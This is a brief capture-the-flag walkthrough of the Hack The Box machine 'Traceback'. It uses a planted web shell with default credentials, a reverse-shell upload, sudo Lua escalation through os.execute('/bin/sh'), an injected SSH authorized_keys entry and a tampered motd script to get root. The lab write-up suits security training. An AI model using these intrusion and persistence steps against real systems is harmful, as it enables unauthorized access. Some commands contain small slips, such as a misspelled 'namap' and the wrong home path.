HTB::Traceback Walkthrough

 

• nmap
• pspy
• gtfobins
• OSINT
• SSH with public key

0x03 Pentesting
namap -sC -sV -oN 10.10.10.181
Getting User Access
80 HTTP Website

Hint：Some of the best web shells that you might need ;)， Google it

Test all webshell filename for url

smevk.php webshell works, and username is admin, password is admin.

Upload php reverse shell script through Code Injector module.

$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua 
rm privesc.lua
logout

$ echo 'os.execute("/bin/sh")' > privesc.lua
$ cat privesc.lua
os.execute("/bin/sh")
$sudo -u sysadmin /home/sysadmin/luvit privesc.lua
sh: turning off NDELAY mode

$ id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
cd /home/sysadmin 
ls
luvit
user.txt

Get user flag~

Getting Root Access

create your own ssh in /home/sysadmin/.ssh/authorized_keys

$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC6zGx1XQHjBj5x5D+qqE+0wml2VnALfbz7D5CpexgNrpEDQTOWCEkIAl1Ftt9FNClzdNk+/NFMWXR8dxRHzOl7aQzMa+njQOzh6VyM34YbCGuGgakDCIrsHu25dAwypvJ7Clp22faDDIw6zJxcx84Ir1XSpUeWZ4Cotk+0gVzwg
LHbstRPxyzxROvcsesx9kd251L3/bWJzC53oNDaSXzMBYV7sdjSlPLeD9zHJ39wr5YaEFwn0vkgPR+VAdlXAOLi98Ttr+FYMsGr8XMbJU06QKZ2ozf6RVjc6RJ5hjgIFbcxV8VCNGM6rBx5FDCZDgnbzu4ITWpWsgBBLu3JndjD+UWkeejLE4K7eR3510W/x4zHF/0TsZicyh/ZJb
ZEo+JefvVKT0WAilaJ2K7w7jDkrPhZO6TheGTDnvLqrEvHObGq70ytpZ6ippsm78/xkwCHu4l03RMd2Zt+7elXOsA/4WsjEvS+CxqlbtTC636+T6T4cTro2GHlO3lAq7oddq0= kali@kali >> /home/webadmin/.ssh/authorized_keys

$ cd /etc/update-motd.d/
$ echo "cat /root/root.txt" >> 00-header

$ ssh -i id_rsa sysadmin@10.10.10.181

you will get root flag